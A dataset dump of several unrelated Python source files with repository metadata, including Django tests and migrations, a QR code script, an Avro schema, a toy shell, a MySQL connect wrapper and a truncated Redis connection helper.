iec/iec_lookup/tests/test_integration_services.py
divinedeveloper/iec-web-service
0d5e7a05356cc8d88372a559bd5df787d8dc1f75
[ "MIT" ]
null
null
null
from iec_lookup.services.iec_lookup_service import IECLookupService from iec_lookup.tests.fixtures import mongo_test_db_setup, importer_exporter_code_details_as_json, importer_exporter_code_details_as_object, dgft_succes_response_html_string, dgft_error_response_html_string, iec_table_section_list, basic_iec_details_as_object, dgft_error_message # from bs4 import BeautifulSoup, NavigableString, Tag import bs4 from iec_lookup.models import ImporterExporterCodeDetails, Director, Branch, RegistrationDetails, RegistrationCumMembershipCertificateDetails, ImporterExporterCodeToBeRetrieved from iec_lookup.custom_exceptions import CustomApiException from django.conf import settings from rest_framework import status from collections import OrderedDict import mock from mock import MagicMock import mongoengine import pytest from iec_lookup import utils from pprint import pprint from pytest_mock import mocker import mongomock import requests import json import logging # Create your tests here. # Feature: To be able to do something # In order to do something # As someone # I want the system to do this thing # Scenario: A sample one # Given this situation # When I do something # Then what I get is what I was expecting for @pytest.mark.integrationtest @pytest.mark.usefixtures('mongo_test_db_setup') class TestIntegrationIecLookupService: def setup_method(self): """ Initial data setup """ self.request_json = {'code': "1198002743",'name': "CAP"} self.non_existing_iec_json = {'code': "1298001743",'name': "PAC"} self.iec_lookup_service = IECLookupService() @pytest.mark.xfail(raises= requests.exceptions.ConnectionError, reason="DGFT site down") def test_integration_check_dgft_site_down(self): """ This method will tests poll_dgft_site_with_iec_and_name method in service check if dgft site is down and get ERROR assert message is ERROR then site is down else not """ dgft_site_response = self.iec_lookup_service.poll_dgft_site_with_iec_and_name(self.request_json) assert dgft_site_response 
!= "ERROR" def test_integration_save_complete_iec_details(self, basic_iec_details_as_object, importer_exporter_code_details_as_object): """ This method will tests save_complete_iec_details method in service get all data and save in iec details document assert data is persisted """ saved_iec_details = self.iec_lookup_service.save_complete_iec_details(basic_iec_details_as_object, importer_exporter_code_details_as_object.directors,importer_exporter_code_details_as_object.branches, importer_exporter_code_details_as_object.registration_details,importer_exporter_code_details_as_object.rcmc_details) mongo_test_db_setup.document_id = saved_iec_details.id assert saved_iec_details.importer_exporter_code == basic_iec_details_as_object.importer_exporter_code assert basic_iec_details_as_object.party_name in saved_iec_details.party_name assert saved_iec_details.exporter_type != "" or None assert saved_iec_details.importer_exporter_code_status != "" or None assert saved_iec_details.nature_of_concern != "" or None def test_integration_get_iec_with_code_and_name(self): """ This method will tests get_iec_with_code_and_name method in service to check if dgft site is up and get data assert data is returned as per request """ importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.request_json) assert importer_exporter_code_details.id == mongo_test_db_setup.document_id assert importer_exporter_code_details.importer_exporter_code == self.request_json['code'] assert self.request_json['name'] in importer_exporter_code_details.party_name assert importer_exporter_code_details.exporter_type != "" or None assert importer_exporter_code_details.importer_exporter_code_status != "" or None assert importer_exporter_code_details.nature_of_concern != "" or None def test_integration_iec_with_code_and_name_not_in_db(self): """ This method will tests get_iec_with_code_and_name method in service to check if iec data is available in db assert none is returned """ 
importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.non_existing_iec_json) assert importer_exporter_code_details == None def test_integration_save_iec_to_retrieve_data(self): """ This method will tests get_or_save_iec_to_retrieve_data method in service to check if dgft site is down save iec code and name to fetch data later assert iec to be retrieved is persisted """ importer_exporter_code_to_retrieve = self.iec_lookup_service.get_or_save_iec_to_retrieve_data(self.non_existing_iec_json) mongo_test_db_setup.document_id = importer_exporter_code_to_retrieve.id assert importer_exporter_code_to_retrieve.importer_exporter_code == self.non_existing_iec_json['code'] assert self.non_existing_iec_json['name'] == importer_exporter_code_to_retrieve.name assert importer_exporter_code_to_retrieve.is_iec_data_retrieved == False def test_integration_get_iec_to_retrieve_data(self): """ This method will tests get_or_save_iec_to_retrieve_data method in service to check if dgft site is down fetch iec code and name from iec to be retrieved assert iec to be retrieved exists """ importer_exporter_code_to_retrieve = self.iec_lookup_service.get_or_save_iec_to_retrieve_data(self.non_existing_iec_json) assert importer_exporter_code_to_retrieve.id == mongo_test_db_setup.document_id assert importer_exporter_code_to_retrieve != None def test_integration_no_iec_with_code_and_name_in_db(self): """ This method will tests get_iec_with_code_and_name method in service to check if dgft site is up and get data assert data is returned as per request """ importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.non_existing_iec_json) assert importer_exporter_code_details == None def test_integration_retrieve_iec_data_with_code(self): """ This method will tests retrieve_iec_data_with_code method in service to check if iec data is present in db assert data is returned as per iec code """ importer_exporter_code_details = 
self.iec_lookup_service.retrieve_iec_data_with_code(self.request_json['code']) assert importer_exporter_code_details.importer_exporter_code == self.request_json['code'] assert self.request_json['name'] in importer_exporter_code_details.party_name assert importer_exporter_code_details.exporter_type != "" or None assert importer_exporter_code_details.importer_exporter_code_status != "" or None assert importer_exporter_code_details.nature_of_concern != "" or None def test_integration_not_found_retrieve_iec_data_with_code(self): """ This method will tests retrieve_iec_data_with_code method in service assert iec not found exception is raised """ with pytest.raises(CustomApiException) as exc_info: self.iec_lookup_service.retrieve_iec_data_with_code(self.non_existing_iec_json['code']) def teardown_method(self): """ Set values to none """ self.request_json = None self.non_existing_iec_json = None self.iec_lookup_service = None
42.595238
279
0.827138
1,083
7,156
5.051708
0.154201
0.11698
0.146226
0.118443
0.623286
0.564979
0.481448
0.439773
0.418753
0.400658
0
0.003486
0.118083
7,156
167
280
42.850299
0.863413
0.23938
0
0.205128
0
0
0.021228
0
0
0
0
0
0.307692
1
0.141026
false
0
0.628205
0
0.782051
0.012821
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
7578054f5e5fa0cd2bf6c67b5dfd6c6a49acba24
563
py
Python
posts/migrations/0002_auto_20181129_2311.py
ddeveloper72/Dhjango-Blog
8f9771a149a944e32aa192de97ab69092a1492d2
[ "CC-BY-3.0" ]
null
null
null
posts/migrations/0002_auto_20181129_2311.py
ddeveloper72/Dhjango-Blog
8f9771a149a944e32aa192de97ab69092a1492d2
[ "CC-BY-3.0" ]
null
null
null
posts/migrations/0002_auto_20181129_2311.py
ddeveloper72/Dhjango-Blog
8f9771a149a944e32aa192de97ab69092a1492d2
[ "CC-BY-3.0" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.11.15 on 2018-11-29 23:11 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('posts', '0001_initial'), ] operations = [ migrations.RenameField( model_name='post', old_name='piblished_date', new_name='published_date', ), migrations.RenameField( model_name='post', old_name='view', new_name='views', ), ]
21.653846
49
0.57016
58
563
5.293103
0.655172
0.136808
0.169381
0.19544
0.267101
0.267101
0.267101
0
0
0
0
0.056848
0.312611
563
25
50
22.52
0.736434
0.122558
0
0.333333
1
0
0.126273
0
0
0
0
0
0
1
0
false
0
0.111111
0
0.277778
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
7593f4e87b009e30bfc06b0f207cd76f6db5a110
288
py
Python
QRcodegenerator.py
arpitarunkumaar/Hacktoberfest2021
0af40f90a6c0716caadbbfff44ece947b6146f60
[ "MIT" ]
125
2021-10-01T19:05:26.000Z
2021-10-03T13:32:42.000Z
QRcodegenerator.py
arpitarunkumaar/Hacktoberfest2021
0af40f90a6c0716caadbbfff44ece947b6146f60
[ "MIT" ]
201
2021-10-30T20:40:01.000Z
2022-03-22T17:26:28.000Z
QRcodegenerator.py
arpitarunkumaar/Hacktoberfest2021
0af40f90a6c0716caadbbfff44ece947b6146f60
[ "MIT" ]
294
2021-10-01T18:46:05.000Z
2021-10-03T14:25:07.000Z
import pyqrcode from pyqrcode import QRCode # String which represent the QR code s = "https://www.youtube.com/channel/UCeO9hPCfRzqb2yTuAn713Mg" # Generate QR code url = pyqrcode.create(s) # Create and save the png file naming "myqr.png" url.svg("myyoutube.svg", scale = 8)
24
62
0.725694
41
288
5.097561
0.731707
0.057416
0
0
0
0
0
0
0
0
0
0.025316
0.177083
288
11
63
26.181818
0.85654
0.347222
0
0
1
0
0.377049
0
0
0
0
0
0
1
0
false
0
0.4
0
0.4
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
759e1233cd5221eb7c3d3a4d3d8e9c2c06bf7609
234
py
Python
backend/templatetags/back_tag.py
h1gfun4/h1gfun4.github.io
e460467cb505b525ecd5b01b9eb3fd73de7ec6e1
[ "MIT" ]
null
null
null
backend/templatetags/back_tag.py
h1gfun4/h1gfun4.github.io
e460467cb505b525ecd5b01b9eb3fd73de7ec6e1
[ "MIT" ]
null
null
null
backend/templatetags/back_tag.py
h1gfun4/h1gfun4.github.io
e460467cb505b525ecd5b01b9eb3fd73de7ec6e1
[ "MIT" ]
null
null
null
from django import template from backend.models import Back register = template.Library() @register.inclusion_tag('backend/tags/scrollMenuB.html') def get_back(): scrollB = Back.objects.all() return {"scrollMenuB": scrollB }
26
56
0.75641
29
234
6.034483
0.689655
0
0
0
0
0
0
0
0
0
0
0
0.128205
234
9
57
26
0.857843
0
0
0
0
0
0.170213
0.123404
0
0
0
0
0
1
0.142857
false
0
0.285714
0
0.571429
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
75c58beec52cc06cb6843a182d38d84b973164ec
1,358
py
Python
serializers_test/avro_avg.py
lioritan/Side-Projects
647bdbf0d3b71ea113739fb7ad2b299aea28c653
[ "MIT" ]
null
null
null
serializers_test/avro_avg.py
lioritan/Side-Projects
647bdbf0d3b71ea113739fb7ad2b299aea28c653
[ "MIT" ]
null
null
null
serializers_test/avro_avg.py
lioritan/Side-Projects
647bdbf0d3b71ea113739fb7ad2b299aea28c653
[ "MIT" ]
null
null
null
import avro.schema import json import fastavro SCHEMA = { "namespace": "avg_obj", "type": "record", "name": "Meme", "fields": [ {"name": "user", "type": { "type": "record", "name": "PostUser", "fields": [ {"name": "user_id", "type": "string"}, {"name": "first_name", "type": ["null", "string"], "default": "null"}, {"name": "last_name", "type": ["null", "string"], "default": "null"}, {"name": "user_type", "type": ["null", {"type": "enum", "name": "UserType", "symbols": ["FREE", "REGULAR", "PREMIUM"] }], "default": "null"}, ]}}, {"name": "title", "type": ["null", "string"], "default": "null"}, {"name": "content", "type": ["null", "bytes"], "default": "null"}, {"name": "top_string", "type": ["null", "string"], "default": "null"}, {"name": "botom_string", "type": ["null", "string"], "default": "null"}, {"name": "likes", "type": ["null", "long"], "default": 0}, {"name": "hates", "type": ["null", "long"], "default": 0}, ] } avro_schema = fastavro.parse_schema(SCHEMA)
38.8
89
0.401325
110
1,358
4.872727
0.336364
0.134328
0.195896
0.195896
0.382463
0.307836
0.253731
0
0
0
0
0.002307
0.361561
1,358
34
90
39.941176
0.615917
0
0
0.133333
0
0
0.338733
0
0
0
0
0
0
1
0
false
0
0.1
0
0.1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
75caae991e7575297539a0a5755bf9b4493ee335
3,258
py
Python
pysh.py
tri-llionaire/tri-llionaire.github.io
5134d3ec0ff1e3b7eab469ea05300b505895212f
[ "MIT" ]
1
2018-04-24T14:53:23.000Z
2018-04-24T14:53:23.000Z
pysh.py
tri-llionaire/tri-llionaire.github.io
5134d3ec0ff1e3b7eab469ea05300b505895212f
[ "MIT" ]
null
null
null
pysh.py
tri-llionaire/tri-llionaire.github.io
5134d3ec0ff1e3b7eab469ea05300b505895212f
[ "MIT" ]
1
2018-08-25T21:15:07.000Z
2018-08-25T21:15:07.000Z
#pysh: shell in python import sys cmdlist = ['start','exit','cd','md','ls','pd','cf','cl'] convert = [] waiting = 0 print 'pysh 1.0.5 19.03.11 #6. type start to enter, exit to leave.' paths = ['pysh/'] direct = 'pysh/' added = [] entered = raw_input(': ') if entered == 'start': while entered != ['exit']: entered = raw_input('{} '.format(direct)) entered = entered.split() for x in entered: if x in cmdlist: if waiting == 0: if x == 'ls': for i in paths: if i.startswith(direct) and len(i) > len(direct): temp = len(direct) splitted = i[temp:].split('/') if len(splitted) > 1 and (splitted[0] + '/') not in added: print splitted[0] + '/' added.append(splitted[0] + '/') elif len(splitted) < 2 and splitted[0] not in added: print splitted[0] added.append(splitted[0]) else: pass else: pass elif x == 'pd': print direct elif x == 'cd': waiting = 1 elif x == 'md': waiting = 2 elif x == 'cf': waiting = 3 elif x == 'start': print 'already in pysh' elif x == 'cl': sys.stdout.write('\x1b[2J\x1b[H') else: break else: print 'pysh: consecutive cmd {}'.format(x) else: if waiting == 1: if x == '..': direct = direct[:-1].rsplit('/',1)[0] + '/' else: if direct + x + '/' in paths: direct = direct + x + '/' elif x.endswith('/'): if direct + x in paths: direct = direct + x else: print 'pysh: directory \'{}\' not found'.format(x) else: print 'pysh: can\'t cd to file \'{}\''.format(x) waiting = 0 elif waiting == 2: if x.endswith('/'): paths.append(direct + x) else: paths.append(direct + x + '/') waiting = 0 elif waiting == 3: if x.endswith('/'): paths.append(direct + x - '/') else: paths.append(direct + x) waiting = 0 else: print 'pysh: {} not found.'.format(x) break else: print 'startup: {} not found'.format(entered)
40.222222
90
0.329343
275
3,258
3.894545
0.258182
0.052288
0.048553
0.067227
0.297852
0.268908
0.268908
0.268908
0.214753
0.214753
0
0.024322
0.558318
3,258
80
91
40.725
0.719944
0.006446
0
0.303797
0
0.012658
0.082818
0
0
0
0
0
0
0
null
null
0.025316
0.012658
null
null
0.126582
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
f9557c2acc79de6411f64feb5d4d5550266b917c
992
py
Python
release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py
YKato521/ironpython-stubs
b1f7c580de48528490b3ee5791b04898be95a9ae
[ "MIT" ]
null
null
null
release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py
YKato521/ironpython-stubs
b1f7c580de48528490b3ee5791b04898be95a9ae
[ "MIT" ]
null
null
null
release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py
YKato521/ironpython-stubs
b1f7c580de48528490b3ee5791b04898be95a9ae
[ "MIT" ]
null
null
null
class EventLogPermissionEntry(object): """ Defines the smallest unit of a code access security permission that is set for an System.Diagnostics.EventLog. EventLogPermissionEntry(permissionAccess: EventLogPermissionAccess,machineName: str) """ @staticmethod def __new__(self, permissionAccess, machineName): """ __new__(cls: type,permissionAccess: EventLogPermissionAccess,machineName: str) """ pass MachineName = property( lambda self: object(), lambda self, v: None, lambda self: None ) """Gets the name of the computer on which to read or write events. Get: MachineName(self: EventLogPermissionEntry) -> str """ PermissionAccess = property( lambda self: object(), lambda self, v: None, lambda self: None ) """Gets the permission access levels used in the permissions request. Get: PermissionAccess(self: EventLogPermissionEntry) -> EventLogPermissionAccess """
24.8
112
0.686492
97
992
6.938144
0.536082
0.089153
0.15156
0.160475
0.178306
0.178306
0.178306
0.178306
0.178306
0.178306
0
0
0.228831
992
39
113
25.435897
0.879739
0.279234
0
0.2
0
0
0
0
0
0
0
0
0
1
0.1
false
0.1
0
0
0.4
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
f9564d9454e04c5d07bedcb3655d9efe0ca449c7
133
py
Python
compound_types/built_ins/lists.py
vahndi/compound-types
cda4f49651b4bfbcd9fe199de276be472620cfad
[ "MIT" ]
null
null
null
compound_types/built_ins/lists.py
vahndi/compound-types
cda4f49651b4bfbcd9fe199de276be472620cfad
[ "MIT" ]
null
null
null
compound_types/built_ins/lists.py
vahndi/compound-types
cda4f49651b4bfbcd9fe199de276be472620cfad
[ "MIT" ]
null
null
null
from typing import List BoolList = List[bool] DictList = List[dict] FloatList = List[float] IntList = List[int] StrList = List[str]
16.625
23
0.736842
19
133
5.157895
0.736842
0
0
0
0
0
0
0
0
0
0
0
0.150376
133
7
24
19
0.867257
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.166667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
f95b8e23ac103c21bff72619bd1a14be401e08f2
161
py
Python
alexa_skill_boilerplate/__init__.py
variable/alexa_skill_boilerplate
c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc
[ "MIT" ]
null
null
null
alexa_skill_boilerplate/__init__.py
variable/alexa_skill_boilerplate
c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc
[ "MIT" ]
null
null
null
alexa_skill_boilerplate/__init__.py
variable/alexa_skill_boilerplate
c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """Top-level package for Alexa Skill Boilerplate.""" __author__ = """James Lin""" __email__ = 'james@lin.net.nz' __version__ = '0.1.0'
20.125
52
0.639752
22
161
4.136364
0.863636
0.175824
0
0
0
0
0
0
0
0
0
0.028986
0.142857
161
7
53
23
0.630435
0.428571
0
0
0
0
0.348837
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
f9873b3ec6305739faa020963cb0f6929823dc6d
799
py
Python
e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py
zhouli121018/nodejsgm
0ccbc8acf61badc812f684dd39253d55c99f08eb
[ "MIT" ]
null
null
null
e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py
zhouli121018/nodejsgm
0ccbc8acf61badc812f684dd39253d55c99f08eb
[ "MIT" ]
18
2020-06-05T18:17:40.000Z
2022-03-11T23:25:21.000Z
e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py
zhouli121018/nodejsgm
0ccbc8acf61badc812f684dd39253d55c99f08eb
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('core', '0050_customersetting_can_view_mail'), ] operations = [ migrations.AddField( model_name='customersetting', name='transfer_max_size', field=models.IntegerField(default=0, help_text='\u5355\u4f4d\uff1aM\uff0c\u90ae\u4ef6\u5927\u5c0f\u8d85\u8fc7\u8be5\u9600\u503c\uff0c\u5219\u8be5\u90ae\u4ef6\u53d1\u9001\u65f6\u81ea\u52a8\u8f6c\u7f51\u7edc\u9644\u4ef6, \u9ed8\u8ba4\u503c\uff10, \u8868\u793a\u7528\u7cfb\u7edf\u9ed8\u8ba4\u8bbe\u7f6e\u503c', verbose_name='\u4e2d\u7ee7\uff1a\u81ea\u52a8\u8f6c\u7f51\u7edc\u9644\u4ef6\u6700\u5927\u9600\u503c'), ), ]
39.95
421
0.713392
100
799
5.56
0.72
0.035971
0.053957
0.071942
0.125899
0.125899
0.125899
0
0
0
0
0.212299
0.145181
799
19
422
42.052632
0.601757
0.026283
0
0
0
0.153846
0.529639
0.48067
0
0
0
0
0
1
0
false
0
0.153846
0
0.384615
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
f98d78abc4c61ae00ffd3cee5b5299a82b124239
505
py
Python
umysqldb/__init__.py
arozumenko/pyumysql
34b61faf33e2db644b02c483c07ddca32165539a
[ "Apache-2.0" ]
null
null
null
umysqldb/__init__.py
arozumenko/pyumysql
34b61faf33e2db644b02c483c07ddca32165539a
[ "Apache-2.0" ]
null
null
null
umysqldb/__init__.py
arozumenko/pyumysql
34b61faf33e2db644b02c483c07ddca32165539a
[ "Apache-2.0" ]
null
null
null
from umysqldb import connections from umysqldb import cursors def connect(db, host="localhost", port=3306, user="root", passwd="root", charset="utf8", cursorclass=cursors.Cursor, autocommit=False): return connections.Connection(database=db, host=host, port=port, user=user, passwd=passwd, charset=charset, cursorclass=cursorclass, autocommit=autocommit) Connection = Connect = connect
42.083333
79
0.609901
48
505
6.416667
0.5
0.077922
0.116883
0
0
0
0
0
0
0
0
0.014124
0.29901
505
12
80
42.083333
0.855932
0
0
0
0
0
0.041502
0
0
0
0
0
0
1
0.111111
false
0.222222
0.222222
0.111111
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
1
0
0
0
2
f9a2fdd3c94e96ddac9d38ba04e226d5f50ff29b
452
py
Python
docker/dev_app/views.py
uw-it-aca/uw-django-saml2
04cd99c0f8fff6160c13e3aa0e44324f6a4079fe
[ "Apache-2.0" ]
2
2018-04-20T19:02:11.000Z
2020-01-21T07:08:48.000Z
docker/dev_app/views.py
uw-it-aca/uw-django-saml2
04cd99c0f8fff6160c13e3aa0e44324f6a4079fe
[ "Apache-2.0" ]
71
2018-03-27T17:52:31.000Z
2022-02-18T23:09:05.000Z
docker/dev_app/views.py
uw-it-aca/uw-django-saml2
04cd99c0f8fff6160c13e3aa0e44324f6a4079fe
[ "Apache-2.0" ]
1
2018-12-04T19:20:36.000Z
2018-12-04T19:20:36.000Z
from django.conf import settings from django.contrib.auth.decorators import login_required from django.http import HttpResponse from uw_saml.utils import is_member_of_group # Create your views here. @login_required def index(request): if is_member_of_group(request, settings.UW_SAML_PERMISSIONS['perm2']): return HttpResponse("Hello, world. You have perm2.") else: return HttpResponse("Hello, world. You don't have perm2.")
28.25
74
0.765487
64
452
5.234375
0.578125
0.089552
0.059701
0.089552
0.185075
0
0
0
0
0
0
0.007833
0.152655
452
15
75
30.133333
0.866841
0.050885
0
0
0
0
0.161593
0
0
0
0
0
0
1
0.1
false
0
0.4
0
0.7
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
f9ade94d5d26429d7edd4cdfcee8f28919e4bd4f
597
py
Python
ror/NoTieResolver.py
jakub-tomczak/ror
cf9ab38a2d66f4816a1289b9726911960059fce7
[ "MIT" ]
null
null
null
ror/NoTieResolver.py
jakub-tomczak/ror
cf9ab38a2d66f4816a1289b9726911960059fce7
[ "MIT" ]
null
null
null
ror/NoTieResolver.py
jakub-tomczak/ror
cf9ab38a2d66f4816a1289b9726911960059fce7
[ "MIT" ]
null
null
null
from ror.RORParameters import RORParameters
from ror.RORResult import RORResult
from ror.AbstractTieResolver import AbstractTieResolver
from ror.result_aggregator_utils import Rank


class NoTieResolver(AbstractTieResolver):
    """Tie resolver that performs no resolution: ranks pass through unchanged."""

    def __init__(self) -> None:
        """Register this resolver under the name 'NoResolver'."""
        super().__init__('NoResolver')

    def resolve_rank(self, rank: Rank, result: RORResult, parameters: RORParameters) -> Rank:
        """Run the base-class bookkeeping, then return *rank* untouched."""
        super().resolve_rank(rank, result, parameters)
        return rank

    def help(self) -> str:
        """Return a human-readable description of this resolver's behavior."""
        return 'This resolver does nothing. It just returns same rank as was provided as an input.'
37.3125
99
0.740369
71
597
6.056338
0.507042
0.065116
0.065116
0
0
0
0
0
0
0
0
0
0.18258
597
16
99
37.3125
0.881148
0
0
0
0
0
0.153846
0
0
0
0
0
0
1
0.25
false
0
0.333333
0.083333
0.833333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
0
0
0
2
f9b1deee9145e20a82bd34752d2e98a230a5a620
568
py
Python
src/database/migrations/0027_auto_20190829_1530.py
gregory-chekler/api
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
[ "MIT" ]
2
2020-07-24T12:58:17.000Z
2020-12-17T02:26:13.000Z
src/database/migrations/0027_auto_20190829_1530.py
gregory-chekler/api
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
[ "MIT" ]
214
2019-06-26T17:33:54.000Z
2022-03-26T00:02:34.000Z
src/database/migrations/0027_auto_20190829_1530.py
massenergize/portalBackEnd
7ed971b2be13901667a216d8c8a46f0bed6d6ccd
[ "MIT" ]
6
2020-03-13T20:29:06.000Z
2021-08-20T16:15:08.000Z
# Generated by Django 2.2.3 on 2019-08-29 15:30 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('database', '0026_auto_20190829_1528'), ] operations = [ migrations.AddField( model_name='vendor', name='email', field=models.EmailField(blank=True, max_length=100), ), migrations.AddField( model_name='vendor', name='phone_number', field=models.CharField(blank=True, max_length=100), ), ]
23.666667
64
0.584507
60
568
5.4
0.666667
0.111111
0.141975
0.166667
0.358025
0.228395
0
0
0
0
0
0.092965
0.299296
568
23
65
24.695652
0.721106
0.079225
0
0.352941
1
0
0.115163
0.044146
0
0
0
0
0
1
0
false
0
0.058824
0
0.235294
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
f9b5c8efc58630f49b1fe78511366116237e9554
471
py
Python
tests/conditions/operators/test_set_membership_operator.py
rusintez/flipper-client
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
[ "Apache-2.0" ]
82
2019-04-03T16:09:04.000Z
2022-03-29T23:48:31.000Z
tests/conditions/operators/test_set_membership_operator.py
rusintez/flipper-client
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
[ "Apache-2.0" ]
17
2019-04-16T17:17:36.000Z
2021-02-25T22:06:01.000Z
tests/conditions/operators/test_set_membership_operator.py
rusintez/flipper-client
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
[ "Apache-2.0" ]
12
2019-07-29T20:07:28.000Z
2022-03-29T21:10:15.000Z
import unittest

from flipper.conditions.operators.set_membership_operator import SetMembershipOperator


class TestCompare(unittest.TestCase):
    """Behavioural checks for SetMembershipOperator.compare."""

    def setUp(self):
        # One fresh operator per test, mirroring the original per-test construction.
        self.operator = SetMembershipOperator()

    def test_returns_true_when_expected_is_in_actual(self):
        self.assertTrue(self.operator.compare(1, [1, 2, 3]))

    def test_returns_false_when_expected_is_not_in_actual(self):
        self.assertFalse(self.operator.compare(1, [2, 3, 4]))
29.4375
86
0.760085
56
471
6.089286
0.571429
0.041056
0.082111
0.117302
0.26393
0.26393
0
0
0
0
0
0.02005
0.152866
471
15
87
31.4
0.834586
0
0
0.222222
0
0
0
0
0
0
0
0
0.222222
1
0.222222
false
0
0.222222
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
f9b8816aef7a829b307e2a9d13b933fbcd80a3a1
353
py
Python
tests/utils/test_gzipgen.py
takanabe/cli
7cbf781d7f286fc4e52ef0980712c28f386e8d09
[ "Apache-2.0" ]
19
2021-01-07T06:41:51.000Z
2022-03-05T08:23:57.000Z
tests/utils/test_gzipgen.py
takanabe/cli
7cbf781d7f286fc4e52ef0980712c28f386e8d09
[ "Apache-2.0" ]
189
2020-11-04T15:38:47.000Z
2022-03-31T05:02:06.000Z
tests/utils/test_gzipgen.py
takanabe/cli
7cbf781d7f286fc4e52ef0980712c28f386e8d09
[ "Apache-2.0" ]
7
2020-11-20T16:55:51.000Z
2022-02-01T11:17:30.000Z
import gzip
from unittest import TestCase

from launchable.utils.gzipgen import compress


class GzippenTest(TestCase):
    """Basic sanity check of the streaming gzip generator."""

    def test_compress(self):
        chunks = [b'Hello', b' ', b'world']
        # compress() yields gzip members; join them into one encoded blob.
        encoded = b''.join(compress(chunks))
        decoded = gzip.decompress(encoded)
        print(decoded)
        self.assertEqual(decoded, b'Hello world')
27.153846
64
0.654391
44
353
5.227273
0.590909
0.052174
0
0
0
0
0
0
0
0
0
0
0.220963
353
12
65
29.416667
0.836364
0.056657
0
0
0
0
0.067485
0
0
0
0
0
0.111111
1
0.111111
false
0
0.333333
0
0.555556
0.111111
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
f9e18afe3ddb7b565b697f03187cc311b80b604e
670
py
Python
dallinger/redis_utils.py
Dallinger/Dallinger
c3acf1375391ef8cb702641638bf5a5008aa9be3
[ "MIT" ]
100
2016-09-07T03:55:36.000Z
2022-02-28T02:20:10.000Z
dallinger/redis_utils.py
Dallinger/Dallinger
c3acf1375391ef8cb702641638bf5a5008aa9be3
[ "MIT" ]
3,457
2016-09-05T23:21:31.000Z
2022-03-31T19:11:31.000Z
dallinger/redis_utils.py
Dallinger/Dallinger
c3acf1375391ef8cb702641638bf5a5008aa9be3
[ "MIT" ]
53
2016-10-03T07:24:34.000Z
2021-10-20T20:42:38.000Z
import os
from urllib.parse import urlparse

import redis


def connect_to_redis(url=None):
    """Return a connection to Redis.

    If a URL is supplied, it will be used, otherwise an environment
    variable is checked before falling back to a default.

    Since we are generally running on Heroku, and configuring SSL
    certificates is challenging, we disable cert requirements on secure
    connections.
    """
    redis_url = url if url else os.getenv("REDIS_URL", "redis://localhost:6379")
    kwargs = {"url": redis_url}
